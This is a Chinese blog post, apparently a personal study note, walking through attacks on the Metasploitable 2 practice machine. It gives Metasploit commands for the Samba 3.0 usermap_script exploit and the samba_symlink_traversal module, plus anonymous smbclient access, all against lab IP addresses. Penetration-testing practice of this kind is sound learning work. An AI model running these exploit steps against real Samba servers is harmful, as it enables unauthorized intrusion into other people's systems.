注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

Linux 折腾笔记

 
 
 
 
 

日志

 
 

Metasploitable 2 渗透练习:利用samba漏洞渗透  

2013-11-29 23:51:32|  分类: Metasploit |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

用nmap -A 扫描目标主机,得知samba为3.0版本
msf > search samba
msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > info
msf exploit(usermap_script) > set rhost 172.16.177.128
msf exploit(usermap_script) > exploit

Metasploitable 2 渗透练习:利用samba3.0漏洞渗透 - xiao106347 - 学习笔记

Metasploitable 2 渗透练习:利用samba3.0漏洞渗透 - xiao106347 - 学习笔记
 
Metasploitable 2 渗透练习:利用samba3.0漏洞渗透 - xiao106347 - 学习笔记
 
Metasploitable 2 渗透练习:利用samba3.0漏洞渗透 - xiao106347 - 学习笔记
 
Metasploitable 2 渗透练习:利用samba3.0漏洞渗透 - xiao106347 - 学习笔记
 
(转)smb匿名共享目录可写入漏洞:
root@mtx:~# smbclient -L //172.16.227.130
Enter root's password:                #直接敲回车
。。。
msfconsole
msf > use auxiliary/admin/smb/samba_symlink_traversal
msf auxiliary(samba_symlink_traversal) > set rhost 172.16.227.130
msf auxiliary(samba_symlink_traversal) > set smbshare tmp
msf auxiliary(samba_symlink_traversal) > exploit
。。。
smbclient //172.16.227.130/tmp
Enter root's password:             #回车
。。。
Metasploitable 2 渗透练习:利用samba漏洞渗透 - xiao106347 - Linux折腾笔记
 
Metasploitable 2 渗透练习:利用samba漏洞渗透 - xiao106347 - Linux折腾笔记
 
  评论这张
 
阅读(2899)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016